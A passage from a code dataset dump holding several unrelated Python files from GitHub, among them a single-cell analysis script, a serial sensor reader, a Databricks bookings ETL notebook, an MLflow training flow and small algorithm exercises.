genes.\"\nplt.figtext(0.5, 1.0, txt, wrap=True, horizontalalignment='left', fontsize=12)\nplt.show();\n# Compute HVG\n# sc.experimental.pp.highly_variable_genes(adata, batch_key='batch', n_top_genes=4000)\n# sc.pl.highly_variable_genes(adata, save=f'{sample_type}_merged_hvg.pdf')\n# plt.show()\n\nadata.var = adata.var[['highly_variable','highly_variable_nbatches']]\n\n# Filter by HVG\nnum_hvg_genes = 5000\nbatch_msk = np.array(adata.var.highly_variable_nbatches > 1)\nhvg = adata.var[batch_msk].sort_values('highly_variable_nbatches').tail(num_hvg_genes).index\nadata.var['highly_variable'] = [g in hvg for g in adata.var.index]\nadata.var = adata.var[['highly_variable','highly_variable_nbatches']]\nadata = adata[:,hvg]\n\nprint(\"Performing analytic Pearson residual normalization...\")\nsc.experimental.pp.normalize_pearson_residuals(adata)\n\n# print(adata.X)\n\n# Run PCA\n# sc.pp.scale(adata)\n\nsc.tl.pca(adata, svd_solver='arpack', random_state=0)\n\n# Get loadings for each gene for each PC\ndf_loadings = pd.DataFrame(adata.varm['PCs'], index=adata.var_names)\n# get rank of each loading for each PC\ndf_rankings = pd.DataFrame((-1 * df_loadings.values).argsort(0).argsort(0), index=df_loadings.index, columns=df_loadings.columns)\n# c.f. 
with df_loadings.apply(scipy.stats.rankdata, axis=0)\n# evaluate \n# print(\"Top loadings for PC1...\")\n# print(df_loadings[0].sort_values().tail())\n# print(\"Rank of IKZF1 for first 5 PCs...\")\n# print(df_rankings.loc[\"IKZF1\"].head())\n\n\"\"\"sc.pl.pca_overview(adata, color='sample_id', show=False, save=f'{sample_type}_pca_overview.pdf')\n\nsc.pl.pca_loadings(adata, components=[1,2,3,4,5,6,7,8], show=False, save=f'{sample_type}_pca_loadings.pdf')\n\nsc.pl.pca_variance_ratio(adata, n_pcs = 50, show=False, save=f'{sample_type}_variance_ratio.pdf')\"\"\"\n\nprint(\"Computing neighbors...\")\n# Run UMAP to see the difference after integration\nsc.pp.neighbors(adata)\nprint(\"\\nUMAP of merged objects before integration\")\nsc.tl.umap(adata)\nsc.pl.umap(adata, color=[\"condition\"], palette=sc.pl.palettes.default_20, save=f'{sample_type}_merged_condition.pdf');\nplt.show();\n\n# plt.clf()\nprint(\"Saving the merged object...\")\n# Write to file\nadata.write(os.path.join(output_path, f'{sample_type}_merged.h5ad'))\n\n\n# python vis_merge.py -i ../data/out_data -o ../data/out_data","repo_name":"saezlab/CRCDiet","sub_path":"bin/vis_merge.py","file_name":"vis_merge.py","file_ext":"py","file_size_in_byte":9551,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"72213646887","text":"a = open('asia.txt','r') #The first reference point\n\nb = open('europe.txt', 'r') #The second reference point\n\nc = open('africa.txt', 'r') #The third reference point\n\nd = open('america.txt', 'r') #The fourth reference point\n\nreferences = (a.read(), b.read(), c.read(), d.read())\n\ne = open('unknown.txt', 'r') #The genome we are trying to determine\ncheck = e.read()\n\n#For the purposes of this program, we will assume all strings are of identical length\n\nrefDiff = [0, 0, 0, 0] #These 4 integers will record the number of differences between unknown and the four reference points\n\nfor i in range(len(check)):\n for j in range(len(refDiff)):\n if check[i] != references[j][i]:\n refDiff[j] = refDiff[j] + 1\n","repo_name":"coding4medicine/advanced-class-2018","sub_path":"alex/checkAncestr.py","file_name":"checkAncestr.py","file_ext":"py","file_size_in_byte":722,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"25348059622","text":"# -*- coding: utf-8 -*-\n\n#############################################################################\n# python magnetic_rail\n# by Kevin Chiu 2020\n#############################################################################\n\nimport numpy as np\nimport serial\nimport time\nimport sys\n\ng_ser_magnet = serial.Serial('/dev/ttyUSB0', 115200, bytesize=8,\n parity=serial.PARITY_EVEN, stopbits=1, timeout=0.07)\n\n\ndef magnetFuc():\n num = None\n offset = None\n width = None\n\n data_raw = g_ser_magnet.read()\n\n # int_raw = int.from_bytes(data_raw, byteorder='big')\n int_raw = int(data_raw.encode('hex'), 16)\n\n num = int_raw//64\n id = int_raw % 64\n\n if(id == 57 and num == 1):\n data_raw1 = g_ser_magnet.read()\n data_raw2 = g_ser_magnet.read()\n # int_raw1 = int.from_bytes(data_raw1, byteorder='big')\n # int_raw2 = int.from_bytes(data_raw2, byteorder='big')\n int_raw1 = int(data_raw1.encode('hex'), 16)\n int_raw2 = int(data_raw2.encode('hex'), 16)\n P_N = (int_raw1 & 64) >> 6\n if(P_N == 1):\n offset = int_raw1 & 63\n else:\n offset = -(int_raw1 & 63)\n width = (((int_raw2 & 192) >> 2)+((int_raw2 & 63)-41))*2\n\n elif(id == 57 and num != 0):\n data_raw1 = 
g_ser_magnet.read()\n # int_raw1 = int.from_bytes(data_raw1, byteorder='big')\n int_raw1 = int(data_raw1.encode('hex'), 16)\n P_N = (int_raw1 & 64) >> 6\n if(P_N == 1):\n offset = int_raw1 & 63\n else:\n offset = -(int_raw1 & 63)\n\n # print(\"num:{} offset:{} width:{}\".format(num, offset, width))\n return num, offset, width\n\n\nwhile 1:\n num, offset, width = magnetFuc()\n print(\"num:{} offset:{} width:{}\".format(num, offset, width))\n","repo_name":"kev1nCh1u/ivam-ros-agricultural-vehicles","sub_path":"test/magnetic_rail/magnetic_rail_py2.py","file_name":"magnetic_rail_py2.py","file_ext":"py","file_size_in_byte":1785,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"20613264151","text":"import os\n\nfrom google.protobuf.text_format import ParseError\nimport pytest\n\nfrom nvidia_tao_tf1.cv.detectnet_v2.spec_handler.spec_loader import load_experiment_spec\n\ndetectnet_root = os.path.dirname(\n os.path.dirname(\n os.path.dirname(os.path.realpath(__file__))\n )\n)\ngt_training_spec = os.path.join(\n detectnet_root, \"experiment_specs/default_spec.txt\"\n)\ngt_inference_spec = os.path.join(\n detectnet_root, \"experiment_specs/inferencer_spec_etlt.prototxt\"\n)\n\ntopologies = [\n (\"train_val\", gt_training_spec),\n (\"inference\", gt_inference_spec),\n (\"train_val\", gt_inference_spec),\n (\"inference\", gt_training_spec),\n]\n\n\nclass TestDetectnetSpecloader():\n \"\"\"Simple class to test the specification file loader.\"\"\"\n\n @pytest.mark.parametrize(\n \"schema_validation, spec_file_path\", # noqa: E501\n topologies\n )\n def test_spec_loader(self, schema_validation, spec_file_path):\n \"\"\"Load and check if the spec file validator throws an error.\"\"\"\n error_raises = False\n if schema_validation == \"train_val\":\n if os.path.basename(spec_file_path) == \"inferencer_spec_etlt.prototxt\":\n error_raises = True\n elif schema_validation == \"inference\":\n if os.path.basename(spec_file_path) == \"default_spec.txt\":\n error_raises = True\n if error_raises:\n with pytest.raises((AssertionError, ParseError)):\n load_experiment_spec(spec_path=spec_file_path,\n merge_from_default=False,\n validation_schema=schema_validation)\n else:\n load_experiment_spec(\n spec_path=spec_file_path,\n merge_from_default=False,\n validation_schema=schema_validation)\n","repo_name":"NVIDIA/tao_tensorflow1_backend","sub_path":"nvidia_tao_tf1/cv/detectnet_v2/spec_handler/tests/test_spec_loader.py","file_name":"test_spec_loader.py","file_ext":"py","file_size_in_byte":1818,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"53"} +{"seq_id":"7055521619","text":"# Problem No.: 18790\n# Solver: Jinmin Goh\n# Date: 20200314\n# URL: https://www.acmicpc.net/problem/18790\n\n# currently TLE at 26%\n\nimport sys\n\nnotAnsSet = set()\n\ndef DFS(n: int, temp: int, numDict: {int:int}, ansDict = {int:int}) -> {int:int}:\n #print(temp, numDict, ansDict)\n if sum(list(ansDict.values())) == n and temp == 0:\n return ansDict\n tempTuple = []\n for j in ansDict:\n tempTuple.append((j, ansDict[j]))\n tempTuple.sort()\n tempTuple = tuple(tempTuple)\n if sum(list(ansDict.values())) >= n or tempTuple in notAnsSet:\n return\n for i in numDict:\n if numDict[i] == 0:\n continue\n else:\n #print(i, (temp - i) % n)\n numDict[i] -= 1\n ansDict[i] += 1\n tempDict = {}\n for j in ansDict:\n tempDict[j] = ansDict[j]\n tempAns = DFS(n, (temp - i) % n, numDict, tempDict)\n if tempAns:\n return tempAns\n tempTuple = []\n for j in 
tempDict:\n tempTuple.append((j, tempDict[j]))\n tempTuple.sort()\n tempTuple = tuple(tempTuple)\n notAnsSet.add(tempTuple)\n numDict[i] += 1\n ansDict[i] -= 1\n #print(tempAns)\n\ndef main():\n n = int(input())\n if n == 1:\n print(int(input()))\n return\n nums = list(map(int, sys.stdin.readline().split()))\n numDict = {}\n for i in nums:\n if i not in numDict:\n numDict[i] = 1\n else:\n numDict[i] += 1\n if numDict[i] == n:\n ans = [i] * n\n for j in ans:\n print(j, end = \" \")\n return\n ansDict = {}\n for i in range(n):\n ansDict[i] = 0 \n for i in numDict:\n numDict[i] -= 1\n ansDict[i] += 1\n ans = DFS(n, n - i, numDict, ansDict)\n numDict[i] += 1\n ansDict[i] -= 1\n if ans:\n break\n #print(ans)\n for i in ans:\n for j in range(ans[i]):\n print(i, end = \" \")\n return\n\nif __name__ == \"__main__\":\n main()","repo_name":"Jinmin-Goh/BOJ_PS","sub_path":"Solving/18790/18790.py","file_name":"18790.py","file_ext":"py","file_size_in_byte":2133,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"7639636355","text":"\"\"\"\nbuzzword explorer: making human-readable strings from data\n\"\"\"\nimport urllib.parse\n\nfrom buzz.constants import SHORT_TO_LONG_NAME\n\n\ndef _make_description(names, size):\n \"\"\"\n Describe a user-uploaded corpus\n \"\"\"\n desc = \"User-uploaded data, {}. {} file{}: {}\"\n form_names = \", \".join(names[:3])\n if len(names) > 3:\n form_names += \"...\"\n plu = \"s\" if len(names) != 1 else \"\"\n return desc.format(_format_size(size), len(names), plu, form_names)\n\n\ndef _make_table_name(history):\n \"\"\"\n Generate a table name from its history\n \"\"\"\n if history == \"initial\":\n return \"Part of speech tags by filename\"\n specs, show, subcorpora, relative, keyness, sort, multi, cont = history\n if subcorpora is None:\n subcorpora = \"corpus\"\n subcorpora = (\n SHORT_TO_LONG_NAME.get(subcorpora, subcorpora).lower().replace(\"_\", \" \")\n )\n show = [SHORT_TO_LONG_NAME.get(i, i).lower().replace(\"_\", \" \") for i in show]\n show = \"+\".join(show)\n relkey = \", rel. 
freq.\" if relative else \", keyness\"\n if keyness:\n relkey = f\"{relkey} ({keyness})\"\n if relative is False and keyness is False:\n relkey = \" showing absolute frequencies\"\n basic = f\"{show} by {subcorpora}{relkey}, sorting by {sort}\"\n if len(show) > 1 and multi:\n basic += \" (columns split)\"\n if not int(specs):\n return basic\n return f\"{basic} -- from search #{specs}\"\n\n\ndef _format_size(size):\n \"\"\"\n Format size in bytes, kb, or mb\n \"\"\"\n if size < 1000:\n return f\"{size} bytes\"\n if size >= 1000000:\n return f\"{size/1000000:.2f} MB\"\n if size >= 1000:\n return f\"{size/1000:.2f} kB\"\n\n\ndef _make_search_name(history, size, searches):\n \"\"\"\n Generate a search name from its history\n \"\"\"\n import locale\n\n trans = {0: \"match\", 1: \"bigrams\", 2: \"trigrams\"}\n\n locale.setlocale(locale.LC_ALL, \"\")\n if isinstance(history, str):\n return f\"Search entire corpus: {history} ({size:n} tokens)\"\n previous, col, skip, search_string, gram, n, n_results, _ = history\n no = \"not \" if skip else \"\"\n col = SHORT_TO_LONG_NAME.get(col, col)\n relative_corpus = n_results * 100 / size\n prev_total = previous[-2] if isinstance(previous, (tuple, list)) else None\n rel_last = \"\"\n if prev_total is not None:\n rel_last = n_results * 100 / prev_total\n rel_last = f\"/{rel_last:.2f}%\"\n freq = f\"(n={n_results:n}{rel_last}/{relative_corpus:.2f}%)\"\n show = \" \" if not gram else f\"(showing {trans[gram]}) \"\n basic = f\"{col} {no}matching '{search_string}' {show}{freq}\"\n hyphen = \"\"\n while previous:\n hyphen += \"──\"\n previous = int(searches[str(previous)][0])\n if hyphen:\n basic = f\"└{hyphen} \" + basic\n return f\"({n}) {basic}\"\n\n\ndef _search_error(col, search_string):\n \"\"\"\n Check for problems with search\n \"\"\"\n if not search_string:\n return \"No search string provided.\"\n if not col:\n return \"No feature selected to search.\"\n return \"\"\n\n\ndef _table_error(show, subcorpora, updating):\n \"\"\"\n Check for problems with table\n \"\"\"\n if updating:\n return \"\"\n errors = []\n if not show:\n errors.append(\"No choice made for feature to use as columns.\")\n # this is now allowed ... can probably remove this function if\n # we don't do any extra validations.\n if not subcorpora:\n errors.append(\"No choice made for feature to use as index.\")\n if not errors:\n return \"\"\n plural = \"s\" if len(errors) > 1 else \"\"\n return f\"Error{plural}\\n* \" + \"\\n* \".join(errors)\n\n\ndef _capitalize_first(s):\n \"\"\"\n First letter capitalised and notheing else\n \"\"\"\n return s[0].upper() + s[1:]\n\n\ndef _downloadable_name(name):\n \"\"\"\n Make a safe filename for CSV download. 
todo: url safe?\n \"\"\"\n name = name.lower().split(\"-- from \")[0]\n name = name.replace(\" \", \"-\")\n ok = {\"-\", \"_\"}\n name = \"\".join([i for i in name if i.isalnum() or i in ok])\n return name.strip(\"- \").lower()\n\n\ndef _slug_from_name(name):\n \"\"\"\n Make a slug from an (uploaded) corpus name\n \"\"\"\n name = name.replace(\" \", \"-\").lower()\n return urllib.parse.quote_plus(name)\n","repo_name":"cyberprotectionservice/buzzword","sub_path":"explorer/parts/strings.py","file_name":"strings.py","file_ext":"py","file_size_in_byte":4213,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"11860840847","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Aug 20 20:14:19 2021\n\n@author: Lenovo\n\"\"\"\n\n\ndef sortArray(nums):\n \"\"\"\n :type nums: List[int]\n :rtype: List[int]\n \"\"\"\n def heapify(i, end, tree):\n if i >= end:\n return\n child1 = 2*i+1\n child2 = 2*i+2\n max_i = i\n if child1 < end and tree[child1] > tree[max_i]:\n max_i = child1\n if child2 < end and tree[child2] > tree[max_i]:\n max_i = child2\n if i != max_i:\n tree[i], tree[max_i] = tree[max_i], tree[i]\n heapify(max_i, end, tree)\n\n def buildheap(end, tree):\n last_i = end-1\n last_parent = (last_i - 1) // 2\n while last_parent >= 0:\n heapify(last_parent, end, tree)\n last_parent -= 1\n\n end = len(nums)\n buildheap(end, nums)\n while True:\n if end <= 1:\n break\n heapify(0, end, nums)\n nums[0], nums[end-1] = nums[end-1], nums[0]\n end -= 1\n\n\n\n\nnums = [5, 2, 3, 1]\nsortArray(nums)\n","repo_name":"liu-yuxin98/LeetCodeHot100","sub_path":"Arrays/912.py","file_name":"912.py","file_ext":"py","file_size_in_byte":1029,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"27332313977","text":"# Databricks notebook source\n\n\n# COMMAND ----------\n\nfrom pyspark.sql.functions import *\nfrom pyspark.sql.functions import col\nfrom utils.utils import DataPreprocessor\n\n# COMMAND ----------\n\n# Define the path to the mounted directory\npath = \"/mnt/myblob/\"\n\n# Get a list of all files in the mounted directory\nfiles = dbutils.fs.ls(path)\n\n# Filter the list to include only JSON files\njson_files = [f for f in files if f.name.endswith(\".json\")]\n\n# Sort the list by the modification time of each file, in descending order\nsorted_files = sorted(json_files, key=lambda f: f.modificationTime, reverse=True)\n\n# Get the path to the latest modified file\nlatest_file_path = sorted_files[0].path\n\n# Read the data from the latest modified file into a DataFrame\ndf = spark.read.option(\"inferSchema\", \"true\").option(\"multiline\", \"true\").json(latest_file_path)\n\n# COMMAND ----------\n\n# Un-nest the json format\ndf = df.select('root.*')\ndf = df.withColumn(\"page\", explode(df[\"page\"]))\ndf = df.select(\"page.*\")\ndf = df.select('pageurl',\"record.*\")\ndf = df.select(\"pageurl\", \"uniq_id\", \"hotel_id\", \"hotel_name\", \"review_count\", \"rating_count\", \"default_rank\", \"price_rank\", \"ota\", \"checkin_date\", \"crawled_date\", explode(\"room_type\").alias(\"room_type\"))\ndf = df.select(\"pageurl\", \"uniq_id\", \"hotel_id\", \"hotel_name\", \"review_count\", \"rating_count\", \"default_rank\", \"price_rank\", \"ota\", \"checkin_date\", \"crawled_date\", \"room_type.*\")\n\n\n# COMMAND ----------\n\n# Correct the data types\ndf_silver = df.withColumn('hotel_id', df.hotel_id.cast('int')) \\\n .withColumn('review_count', df.review_count.cast('float')) \\\n 
.withColumn('rating_count', df.rating_count.cast('float')) \\\n .withColumn('default_rank', df.default_rank.cast('int')) \\\n .withColumn('price_rank', df.price_rank.cast('int')) \\\n .withColumn('checkin_date', to_date(col('checkin_date'), 'yyyy-MM-dd')) \\\n .withColumn(\"crawled_date\", to_timestamp(col(\"crawled_date\"),\"yyyy-MM-dd HH:mm:ss Z\")) \\\n .withColumn('room_type_price', df.room_type_price.cast('float'))\n\n# COMMAND ----------\n\n# Initialize utils class\npreprocessor = DataPreprocessor(df_silver,threshold=10)\n\n# COMMAND ----------\n\n#Data checks\npreprocessor.count_rows(df_silver)\npreprocessor.num_columns(df_silver,16)\n\n# COMMAND ----------\n\n# Check for nulls\nabove,below = preprocessor.get_nulls(df_silver,threshold=10)\n# Get null report\npreprocessor.null_status(10,above,below)\n\n# COMMAND ----------\n\n# check for nulls and remove columns with more than 10% null values\nno_nulls = preprocessor.remove_nulls(df_silver,above,rows=False)\n\n# COMMAND ----------\n\n#Data checks\npreprocessor.count_rows(no_nulls)\nno_columns = len(df_silver.columns)-len(above)\npreprocessor.num_columns(no_nulls,no_columns)\n\n# COMMAND ----------\n\n# Remove the rows with null values\nno_nulls_rows = preprocessor.remove_nulls(no_nulls,below,rows=True)\n\n# COMMAND ----------\n\n# Remove duplicates\nno_duplicates = preprocessor.check_duplicates(no_nulls_rows)\n\n# COMMAND ----------\n\n# Last check for remaining nulls\nlast_above,last_below = preprocessor.get_nulls(no_duplicates,0)\npreprocessor.null_status(0,last_above,last_below)\n\n# COMMAND ----------\n\n# Write the data to silver data base\nno_duplicates.write.format(\"delta\").mode(\"overwrite\").option(\"mergeSchema\", \"true\").save(\"dbfs:/user/hive/warehouse/silver/bookings_silver\")\n\n# COMMAND ----------\n\n# Data quality check on silver tables\npreprocessor.db_quality_check('silver')\n\n# COMMAND ----------\n\n# MAGIC %sql\n# MAGIC -- what was the total income of hotels based on bookings they had in 2019\n# MAGIC WITH rev AS (\n# MAGIC SELECT \n# MAGIC hotel_id as id,\n# MAGIC hotel_name as name,\n# MAGIC round(SUM(room_type_price),0) AS revenue\n# MAGIC FROM silver.bookings_silver\n# MAGIC GROUP BY 1,2\n# MAGIC ORDER BY SUM(room_type_price) DESC)\n# MAGIC INSERT INTO gold.revenue(hotel_id,hotel_name,revenue)\n# MAGIC SELECT id,name,revenue FROM rev\n# MAGIC WHERE NOT EXISTS (\n# MAGIC SELECT 1 FROM gold.revenue\n# MAGIC WHERE hotel_id = id AND hotel_name = name\n# MAGIC )\n\n# COMMAND ----------\n\n# MAGIC %sql\n# MAGIC WITH Quarter AS(\n# MAGIC SELECT\n# MAGIC hotel_id as Id,\n# MAGIC hotel_name as Name,\n# MAGIC count(*) AS Bookings,\n# MAGIC \n# MAGIC date_format(checkin_date, 'MM') AS Month,\n# MAGIC \n# MAGIC CASE \n# MAGIC WHEN date_format(checkin_date, 'MM') BETWEEN '01' AND '03' THEN 'Q1'\n# MAGIC WHEN date_format(checkin_date, 'MM') BETWEEN '03' AND '06' THEN 'Q2'\n# MAGIC WHEN date_format(checkin_date, 'MM') BETWEEN '06' AND '09' THEN 'Q3' \n# MAGIC ELSE 'Q4'\n# MAGIC END AS Quarter \n# MAGIC FROM silver.bookings_silver\n# MAGIC GROUP BY 1,2,4,5\n# MAGIC )\n# MAGIC INSERT INTO gold.month_quarter_demand(hotel_id,hotel_name,bookings,month,quarter,month_quarter,demand)\n# MAGIC SELECT \n# MAGIC Id,\n# MAGIC Name,\n# MAGIC Bookings,\n# MAGIC Month,\n# MAGIC Quarter,\n# MAGIC CONCAT(Month, '_', Quarter), \n# MAGIC Bookings - COALESCE(lag(Bookings) OVER (PARTITION BY Id ORDER BY Month, Quarter), 0) AS Difference\n# MAGIC FROM Quarter\n# MAGIC WHERE NOT EXISTS (\n# MAGIC SELECT 1 FROM gold.revenue\n# MAGIC WHERE 
hotel_id = id AND hotel_name = name\n# MAGIC )\n\n# COMMAND ----------\n\n# MAGIC %sql\n# MAGIC WITH rooms AS (SELECT \n# MAGIC b.hotel_id AS id, \n# MAGIC b.hotel_name, \n# MAGIC b.room_type_breakfast AS breakfast, \n# MAGIC b.room_type_cancellation AS cancellation, \n# MAGIC b.room_type_name AS room_name,\n# MAGIC round(AVG(b.room_type_price),0) AS avg_price,\n# MAGIC round(AVG(b.room_type_occupancy),0) AS avg_num_persons,\n# MAGIC COUNT(b.crawled_date) AS bookings,\n# MAGIC a.avg_days_diff\n# MAGIC FROM \n# MAGIC silver.bookings_silver b\n# MAGIC INNER JOIN (\n# MAGIC SELECT \n# MAGIC hotel_id, \n# MAGIC hotel_name, \n# MAGIC room_type_breakfast, \n# MAGIC room_type_cancellation, \n# MAGIC room_type_name,\n# MAGIC ROUND(AVG(DATEDIFF(checkin_date,CAST(crawled_date AS DATE))),0) AS avg_days_diff\n# MAGIC FROM \n# MAGIC silver.bookings_silver \n# MAGIC GROUP BY 1,2,3,4,5\n# MAGIC ) a ON \n# MAGIC b.hotel_id = a.hotel_id AND \n# MAGIC b.hotel_name = a.hotel_name AND \n# MAGIC b.room_type_breakfast = a.room_type_breakfast AND \n# MAGIC b.room_type_cancellation = a.room_type_cancellation AND \n# MAGIC b.room_type_name = a.room_type_name\n# MAGIC GROUP BY \n# MAGIC 1,2,3,4,5,9\n# MAGIC )\n# MAGIC INSERT INTO gold.rooms_overview(hotel_id, hotel_name, breakfast, cancelation, room_name, avg_price,avg_num_persons, bookings, avg_days_dif)\n# MAGIC SELECT \n# MAGIC id,\n# MAGIC hotel_name,\n# MAGIC breakfast,\n# MAGIC cancellation,\n# MAGIC room_name,\n# MAGIC avg_price,\n# MAGIC avg_num_persons,\n# MAGIC bookings,\n# MAGIC avg_days_diff\n# MAGIC FROM rooms\n# MAGIC WHERE NOT EXISTS (\n# MAGIC SELECT 1 FROM gold.rooms_overview\n# MAGIC WHERE hotel_id = id AND hotel_name = hotel_name\n# MAGIC )\n\n# COMMAND ----------\n\n# Run quality checks on gold tables\npreprocessor.db_quality_check('gold')\n\n# COMMAND ----------\n\n\n","repo_name":"georgezefko/databrickspipeline","sub_path":"src/BookingsETL.py","file_name":"BookingsETL.py","file_ext":"py","file_size_in_byte":7236,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"71730367207","text":"import matplotlib as mpl\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport sklearn\nimport pandas as pd\nimport os\nimport sys\nimport time\nimport tensorflow as tf\n\nfrom tensorflow import keras\n#print(tf.__verison__)\nprint(sys.version_info)\n#for module in mpl, np, pd, sklearn, tf, keras:\n # print(module.__name__,module.__version__)\n\nfrom sklearn.datasets import fetch_california_housing\nhousing = fetch_california_housing()\n\nfrom sklearn.model_selection import train_test_split\nx_train_all, x_test, y_train_all, y_test = train_test_split(housing.data,housing.target,random_state=7)\nx_train, x_valid, y_train,y_valid = train_test_split(x_train_all,y_train_all,random_state=11)\nprint(x_train.shape,y_train.shape)\nprint(x_valid.shape,y_valid.shape)\nprint(x_test.shape,y_test.shape)\n\nfrom sklearn.preprocessing import StandardScaler\nscaler = StandardScaler()\nx_train_scaled = scaler.fit_transform(x_train)\nx_valid_scaled = scaler.transform(x_valid)\nx_test_scaled = scaler.transform(x_test)\noutput_dir = \"generate_csv\"\nif not os.path.exists(output_dir):\n os.mkdir(output_dir)\n\ndef save_to_csv(out_dir,data,name_prefix,header=None,n_parts=10):\n path_format = os.path.join(output_dir,\"{}_{:02d}.csv\")\n filenames = []\n\n for file_idx, row_indices in enumerate(\n np.array_split(np.arange(len(data)),n_parts)):\n part_csv = path_format.format(name_prefix,file_idx)\n 
filenames.append(part_csv)\n with open(part_csv,'wt',encoding=\"utf-8\") as f:\n if header is not None:\n f.write(header + \"\\n\")\n for row_index in row_indices:\n f.write(\",\".join([repr(col) for col in data[row_index]]))\n f.write('\\n')\n return filenames\n\ntrain_data = np.c_[x_train_scaled,y_train]\nvalid_data = np.c_[x_valid_scaled,y_valid]\ntest_data = np.c_[x_test_scaled,y_test]\nheader_cols = housing.feature_names+[\"MidianHouseValue\"]\nheader_str = \",\".join(header_cols)\ntrain_filename = save_to_csv(output_dir,train_data,\"train\",header_str,n_parts=20)\nvalid_filename = save_to_csv(output_dir,valid_data,\"valid\",header_str,n_parts=10)\ntest_filename = save_to_csv(output_dir,test_data,\"test\",header_str,n_parts=10)\n","repo_name":"Dylanin1999/Tensorflow2.0","sub_path":"4 第四章/4-3 生成csv文件.py","file_name":"4-3 生成csv文件.py","file_ext":"py","file_size_in_byte":2182,"program_lang":"python","lang":"en","doc_type":"code","stars":103,"dataset":"github-code","pt":"53"} +{"seq_id":"15921729298","text":"import argparse\nfrom typing import Optional, Sequence\n\nimport mlflow\nfrom prefect import flow\nfrom prefect.task_runners import SequentialTaskRunner\n\nfrom src.data.preprocess import prepare_data, read_data, split_data\nfrom src.env import (\n ENCODER_PATH,\n EXPERIMENT_NAME,\n MLFLOW_TRACKING_URI,\n NUM_TRIALS,\n TOP_N,\n)\nfrom src.models.hpo import optimize_logistic, optimize_xgboost\nfrom src.models.register import register_best_model\nfrom src.utils import serialize_object\n\n\n@flow(task_runner=SequentialTaskRunner())\ndef train_flow(data_path: str) -> None:\n df = read_data(data_path)\n (features, target), enc = prepare_data(df) # type: ignore\n\n if not ENCODER_PATH:\n raise ValueError(\"ENCODER_PATH environment variable is not defined.\")\n serialize_object(enc, ENCODER_PATH)\n\n train, valid, test = split_data(features, target) # type: ignore\n mlflow.set_tracking_uri(MLFLOW_TRACKING_URI)\n mlflow.set_experiment(EXPERIMENT_NAME)\n\n optimize_logistic(*train, *valid, NUM_TRIALS) # type: ignore\n optimize_xgboost(*train, *valid, NUM_TRIALS) # type: ignore\n register_best_model(*test, TOP_N) # type: ignore\n\n\ndef main(argv: Optional[Sequence[str]] = None) -> None:\n parser = argparse.ArgumentParser()\n parser.add_argument(\"-i\", \"--input-path\", required=True)\n args = parser.parse_args(argv)\n\n train_flow(args.input_path)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"Alvaro-Kothe/Mushroom-Classification","sub_path":"src/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":1422,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"20851520136","text":"# PyMathTools by John Elizarraras\n# This is free; please make any changes you want, no need for credit\nfrom math import gcd\n\n__all__ = ['binary_search', 'mod', 'to_ints', 'read_file', 'latex_gen_graph', 'elliptic_card', 'is_prime']\n\n\ndef binary_search(array, target):\n \"\"\" Does a binary search to find the index of an element in an array. 
WARNING - ARRAY HAS TO BE SORTED\n Keyword arguments:\n array - the array that contains the target\n target - the target element for which its index will be returned\n returns the index of target in array\n \"\"\"\n lower = 0\n upper = len(array)\n while lower < upper:\n x = lower + (upper - lower) // 2\n val = array[x]\n if target == val:\n return x\n elif target > val:\n if lower == x:\n break\n lower = x\n elif target < val:\n upper = x\n\ndef mod(n, modulus):\n ''' A safer mod function instead of %, where fractions are accurately calculated\n Keyword arguments:\n n - the number to take modulo by\n modulus - the modulus\n returns n mod modulus\n '''\n if not(float(modulus).is_integer()):\n raise ValueError('Modulus is not an integer')\n elif float(n).is_integer():\n return n % modulus\n else:\n if float(1/n).is_integer():\n if gcd(int(1/n), int(modulus)) != 1:\n raise ValueError('Inverse of n is not coprime with modulus')\n n = int(1/n)\n i = 1\n while (n * i) % modulus != 1:\n i = i + 1\n return i\n else:\n raise ValueError('Inverse of n is not an integer and n is a fraction')\n\ndef to_ints(array):\n ''' converts everything in an array into ints\n\n Keyword arguments\n array - the array containing the ints\n returns an array with the converted ints\n '''\n for i in range(len(array)):\n array[i] = int(array[i])\n return array\n\ndef read_file(f):\n ''' reads a file and converts the file into an array of floats. It separates numbers by spaces and will go through all the lines. You can use the to_ints function to convert it.\n\n Keyword arguments:\n f - the path/name of the file\n\n returns an array of floats\n '''\n r = open(f, \"r\")\n s = str(r.readline())\n a = []\n while s != \"\":\n s = s.strip().split(\" \")\n for i in s:\n a.append(float(i))\n s = str(r.readline())\n return a\n\ndef latex_gen_graph(array, title, xaxis, yaxis, xmin, ymin, xmax, ymax):\n ''' generates a tikz graph with the provided points\n ----\n if there are too many points (out of memory) try using 'pdflatex --enable-write18 --extra-mem-bot=10000000 --synctex=1 ' to make it compile\n ---\n\n Keyword arguments:\n array - A 2d array where the first column is the x value and the second is the y\n title(str) - the title of the graph. This will also be the title of the produced tex file\n xaxis(str) - the label for the x axis\n yaxis(str) - the label for the y axis\n xmin - the min x value on the x axis\n ymin - the min y value on the y axis\n xmax - the max x value on the x axis\n ymax - the max y value on y axis\n '''\n w = open(title + \".tex\", \"w+\")\n w.write(\"\\\\documentclass{amsart}\\n\\\\usepackage{pgfplots}\\n\\\\begin{document}\\n\\\\begin{tikzpicture}\\n\\\\begin{axis}[\\ntitle = {\"+ title + \"},\\nxlabel={\"+ xaxis +\"},\\nylabel={\" + yaxis + \"},\\nxmin = \" + str(xmin) + \", xmax=\" + str(xmax) + \",\\n\")\n w.write(\"ymin=\" + str(ymin) + \", ymax=\" + str(ymax) + \",\\nlegend pos=north west,\\nymajorgrids=true,\\ngrid style=dashed,\\n]\\n\\n\")\n 